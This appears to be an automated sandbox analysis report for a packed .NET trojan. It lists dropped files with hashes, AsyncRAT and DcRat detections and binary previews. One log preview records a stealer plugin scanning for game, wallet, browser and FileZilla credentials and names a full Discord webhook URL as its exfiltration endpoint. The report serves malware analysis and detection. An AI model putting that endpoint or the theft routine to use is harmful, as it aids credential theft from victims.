SHA-256:	91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
SHA-512:	C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loaader.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.357964438493834
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
MD5:	D8F8A79B5C09FCB6F44E8CFFF11BF7CA
SHA1:	669AFE705130C81BFEFECD7CC216E6E10E72CB81
SHA-256:	91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
SHA-512:	C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loader.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Loader.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.log

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.357964438493834
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
MD5:	D8F8A79B5C09FCB6F44E8CFFF11BF7CA
SHA1:	669AFE705130C81BFEFECD7CC216E6E10E72CB81
SHA-256:	91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
SHA-512:	C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Client.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	75776
Entropy (8bit):	5.79595234679389
Encrypted:	false
SSDEEP:	1536:WUxQcxHCapCtGPMVCe9VdQuDI6H1bf/yBZUu7QzciLVclN:WUOcxHCoeGPMVCe9VdQsH1bfqvUwQzBY
MD5:	7AC0ADF482250172280DEFEC7A7054DA
SHA1:	20A25F0DA68C309D062C4628EAD8B6F377AC7969
SHA-256:	3CAA5F06008365FBECF46198744793C36C42309B49A6324BEBE8123BE10F87D5
SHA-512:	D03D033B931F3D39F95A1EC1CDC7D9014783F11B2438C265DD72C0BC34F9D5CED534A38C7C1C88FF930868FD9CF60521DD556B5C486C5CF364F798F39215A1AA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Client.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Client.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c............................>4... ...@....@.. ....................................@..................................3..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B................ 4......H.......Py..........0....................................................W......H3.......W......3........./.\.....{...."..}......{...."..}......{...."..}.....~....(....9.....~....(....(.....(....n~....(....~.....(....(.....r...p.(.....(.....@....(.....A...(....f.~#...}......}.....($.....($....~....%:....&~....../...sM...%.....sN...(O...~....(..........~....o....9 ...~.....(....(G...9....~.....(.....s................s)........~J................s.........r~....o

C:\Users\user\AppData\Local\Temp\Infected.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64512
Entropy (8bit):	5.808021958358459
Encrypted:	false
SSDEEP:	768:CuY6LVcsTPq781wC8A+XjuazcBRL5JTk1+T4KSBGHmDbD/ph0oX9rAW6dEYSuEdP:reQPckdSJYUbdh9O8uEdpqKmY7
MD5:	B8D455465260A845DB35492FDA5A8888
SHA1:	287B0BA049AD8F3BE802D2224EFB86DBA72D3221
SHA-256:	A150A433C6A3E4278F6CC4CBC85863FC431E5C1E65081AD67253513E8CA01282
SHA-512:	5DBA43AE31420DE362593752E8FF491AFBE8D20F183F6B95E6962EA1E637C7BF3BD50B5213E4D928A96B85D9B54841EE697798B0089624B13EF7EDED826CD86A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Infected.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Infected.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: C:\Users\user\AppData\Local\Temp\Infected.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Joe Sandbox View:	Filename: t3h7DNer1Q.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.eb................................. ... ....@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........f..............................................................W......H3.......W......3........./.\.....(.....~............~............~............~............~............~............~............~.....~............~............~............(C......2~.....oD....s....%r...po....(h...ru..p(....o....o....o....( ... ....(.....s....%r...po....r...po....%r...po.....o....o....( ...Vs.........si.........~"......"...F.(+...~!...o....*&...o.

C:\Users\user\AppData\Local\Temp\WinDefend.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	89088
Entropy (8bit):	6.7771312530772025
Encrypted:	false
SSDEEP:	1536:ohUCASeb09Blk3A6UixmfnDY7Y+SlWrrBOJ0AupJzKo0bxxpxbYmEGQ:YUCArb0aA6Uemr8SgrVCXupJzKo0bxxg
MD5:	5FC6A541845FDAFB597DDFB98FA28B54
SHA1:	22E5DD50DDD71BC39C812DB0F9B164CA10C556DD
SHA-256:	64E4DEDB36812766C522C79CAE57B7F3B2694EFAA396151D4117A70282166117
SHA-512:	F174E4CCC89D4A7473001A9153A9C3D63BEDD393DDA1EA3BE171768B7587846722AD07445ADEAFA52EF54802A8AC84EB33AB1799248DCBF7DB60AA4F311DA5E3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>,..........."...0...................... ....@.. ....................................`.....................................K.......>...........................P...8...............................................................H............%q2.hF6.... ......................@....text...H........................... ..`.rsrc...>............<..............@..@.....................X.............. ..`.reloc...............Z..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0osdllb4.hoj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31rlszfp.fxe.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4u3dcdzg.usd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecaiejov.gkf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ez5ghfow.v2o.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hped3tno.xxs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqn0ny0z.atb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yfe5zsne.wim.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\ce3ed400-d1e84918ad678b08d2a369a3-Latest.log

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2133
Entropy (8bit):	5.143183725099157
Encrypted:	false
SSDEEP:	48:I0EpVMXYgA12Wl266gX6PsUCyziwlit4VVTcyIMy5+Ig1n22RBOn1o/D2WGJ:nDA81RitUXsqU
MD5:	08417E9E59F703DC7CA2F98260B6F51F
SHA1:	0D2BF83E7D0B59F44759277842E7781D1E0B3B3C
SHA-256:	D537581369D0F9464187306B9570A62C6A57D7B289E6584BBCA0C72FE20BEB13
SHA-512:	B3F1033A0E611F1A914693BBA67FBB4F1D2D729AB5BC8CDFA7E8E964DF6E891BFA92D1ADBD9E322AE37BEA048321D52A5BDA07E776536B3FB73DD638EFD296AC
Malicious:	false
Preview:	2024/05/23 09:35:26 ::: Plugin Invoked! >> .2024/05/23 09:35:26 ::: Initializing Client.... .2024/05/23 09:35:26 ::: Plugin Connected! .2024/05/23 09:35:27 ::: Thread Starting!. .2024/05/23 09:35:27 ::: Reading Packet! https://discord.com/api/webhooks/895657579101958174/9Z8CPsHdivzzExezi2PenJZuA1sRTvhR7zSiHiSBhPgUVEAa9HBgrmebF0mbhr4vycB6>>. ...2024/05/23 09:35:27 ::: HideFile : Adding 'hidden' attribute to file C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51 .2024/05/23 09:35:27 ::: Removing Old Data>> Started!. .2024/05/23 09:35:27 ::: Removing Old Data>> Ended!. .2024/05/23 09:35:27 ::: Starting Making Report >> .2024/05/23 09:35:28 ::: Steam >> Application path not found in registry .2024/05/23 09:35:28 ::: Uplay >> Session not found .2024/05/23 09:35:28 ::: BattleNET >> Session not found .2024/05/23 09:35:28 ::: Wallets >> Desktop Wallet is Empty!. .2024/05/23 09:35:28 ::: Chrome Browser Wallets >> No wallets from Chrome browser. ...2024/05/23 09:35:28 ::: FileZila >

C:\Users\user\AppData\Local\Temp\tmp5D77.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5DD6.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5DD7.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5DE8.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5E08.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5E28.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5F43.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5FC1.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\Loaader.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
